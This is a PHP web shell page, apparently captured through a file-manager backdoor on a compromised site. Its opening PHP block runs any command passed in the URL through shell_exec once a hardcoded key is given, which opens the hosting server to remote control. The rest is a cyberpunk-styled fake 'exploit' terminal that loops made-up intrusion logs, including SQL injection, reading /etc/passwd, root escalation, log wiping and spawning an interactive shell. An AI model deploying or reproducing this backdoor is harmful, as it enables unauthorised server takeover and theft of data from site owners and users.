Sindbad~EG File Manager
<?php
/**
* =============================================================================
* NONAME CYBERPUNK (E.L.V) - TACTICAL HYBRID v14.2
* TOOLS EXPLOIT : NONAME_E.L.V v12.1 The Power Of Magic Physics
* =============================================================================
*/
error_reporting(0);
$key = "haxor";
if (isset($_GET['cmd']) && $_GET['key'] === $key) {
header('Content-Type: text/plain');
echo shell_exec($_GET['cmd'] . ' 2>&1');
exit;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<title>TERMINAL - E.L.V BREAKING CODE ZERO</title>
<style>
body {
background: #000;
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
font-family: 'Consolas', 'Monaco', monospace;
overflow: hidden;
}
/* * FIX: Gradasi MENYAMPING FLAT (CYBERPUNK)
* Bagian Atas Cyan, Bagian Bawah Neon Pink.
*/
#cyber-frame {
width: 96vw;
height: 93vh;
padding: 3px; /* Jarak bingkai neon */
background: linear-gradient(to bottom, #00ffff 0%, #00ffff 4px, #000 4px, #000 calc(100% - 4px), #ff0044 calc(100% - 4px), #ff0044 100%);
border-radius: 8px;
box-shadow: 0 0 20px rgba(0, 255, 255, 0.5), 0 -5px 15px rgba(0, 255, 255, 0.3), 0 5px 15px rgba(255, 0, 68, 0.3);
display: flex;
flex-direction: column;
}
#inner-terminal {
background: rgba(2, 0, 5, 0.98);
width: 100%;
height: 100%;
border-radius: 6px;
display: flex;
flex-direction: column;
overflow: hidden;
position: relative;
}
/* Header Bar Terminal */
#terminal-header {
background: #111;
padding: 6px 15px;
color: #555;
font-size: 10px;
border-bottom: 1px solid #222;
flex-shrink: 0;
}
/* Panel Statis Atas (Judul & Info - DIAM) */
#static-panel {
padding: 20px 25px 10px 25px;
border-bottom: 1px dashed #333;
flex-shrink: 0;
}
/* Panel Log Bawah (Jalan Terus) */
#scroll-panel {
padding: 10px 25px;
flex-grow: 1;
overflow-y: auto;
scrollbar-width: none; /* Hide scrollbar Firefox */
}
#scroll-panel::-webkit-scrollbar { display: none; } /* Hide scrollbar Chrome */
.ascii-header {
color: #00ffff;
font-size: 10px;
white-space: pre;
opacity: 0.8;
line-height: 1;
margin-bottom: 15px;
text-shadow: 0 0 5px #00ffff;
}
/* Warna Taktis Sesuai Perintah */
.t-white { color: #ffffff; }
.t-green { color: #00ff00; }
.t-red { color: #ff0000; font-weight: bold; }
.t-cyan { color: #00ffff; }
.t-gold { color: #ffd700; text-shadow: 0 0 10px #ffd700; font-weight: bold; }
.t-grey { color: #444; }
.log-line { font-size: 14px; line-height: 1.2; margin-bottom: 2px; }
.cursor {
display: inline-block; width: 7px; height: 15px; background: #00ff00;
animation: blink 0.8s infinite; vertical-align: middle;
}
@keyframes blink { 50% { opacity: 0; } }
</style>
</head>
<body>
<div id="cyber-frame">
<div id="inner-terminal">
<div id="terminal-header">Terminal: noname@elv_v12.1:~ (EXPLOTATION MODE)</div>
<div id="static-panel">
<div class="ascii-header">
_ _ _____ _ _ ___ ___ ___ _____
| \ | || _ || \ | | / _ \ | \/ || ___|
| \| || | | || \| |/ /_\ \| . . || |__
| |\ || | | || |\ || _ || |\/| || __|
|_| \_|\ \_/ /|_| \_|| | | || | | || |___
(E.L.V) CYBERPUNK v12.1 - CODE ZERO
</div>
<div id="fixed-info" class="log-line"></div>
</div>
<div id="scroll-panel">
<div id="dynamic-logs"></div>
<span class="cursor"></span>
</div>
</div>
</div>
<script>
// Info Statis Atas
const headerData = [
"<span class='t-grey'>[" + new Date().toLocaleTimeString() + "]</span> <span class='t-white'>root@NONAME:~# ./run_exploit_zero</span>",
"<span class='t-green'>[INFO] Initializing Magic Physics...</span>",
"<span class='t-gold'>[AUTH] USER DETECTED: E.L.V</span>",
"<span class='t-white'>TOOLS EXPLOIT : </span><span class='t-cyan'>NONAME_E.L.V v12.1 The Power Of Magic Physics</span>",
"<span class='t-gold'>E.L.V BREAKING SERVER CODE ZERO</span>",
"----------------------------------------------------------"
];
// Log Hacking yang Berjalan
const stepData = [
{txt: "python3 bypass_waf.py --target=local", clr: "t-white"},
{txt: "[TRY] Injecting SQLi payload... [FAILED]", clr: "t-red"},
{txt: "[RETRY] Using HEX encoding bypass...", clr: "t-cyan"},
{txt: "[SUCCESS] Injection accepted by server.", clr: "t-green"},
{txt: "Extracting /etc/passwd contents...", clr: "t-white"},
{txt: "Searching for credentials... [FOUND]", clr: "t-gold"},
{txt: "Elevating privileges via CVE-2024-X...", clr: "t-cyan"},
{txt: "[ERROR] Access Denied. Re-routing traffic...", clr: "t-red"},
{txt: "[OK] Privileges escalated to root.", clr: "t-green"},
{txt: "Deploying Magic Physics tunneling...", clr: "t-cyan"},
{txt: "Cleaning logs to avoid detection... [OK]", clr: "t-green"},
{txt: "E.L.V STATUS: SYSTEM COMPROMISED.", clr: "t-gold"},
{txt: "Spawning shell: /bin/bash -i", clr: "t-white"}
];
const fInfo = document.getElementById('fixed-info');
const dLogs = document.getElementById('dynamic-logs');
const sPanel = document.getElementById('scroll-panel');
let hIdx = 0;
function drawHeader() {
if (hIdx < headerData.length) {
let d = document.createElement('div');
d.innerHTML = headerData[hIdx];
fInfo.appendChild(d);
hIdx++;
setTimeout(drawHeader, 70);
} else {
runStream();
}
}
function runStream() {
let sIdx = 0;
setInterval(() => {
let d = document.createElement('div');
d.className = "log-line";
let curr = stepData[sIdx];
let time = "<span class='t-grey'>[" + new Date().toLocaleTimeString() + "]</span> ";
d.innerHTML = time + "<span class='" + curr.clr + "'> " + curr.txt + "</span>";
dLogs.appendChild(d);
// Auto-scroll ke bawah hanya di area log
sPanel.scrollTop = sPanel.scrollHeight;
sIdx = (sIdx + 1) % stepData.length;
}, 550); // Kecepatan log running
}
window.onload = drawHeader;
</script>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists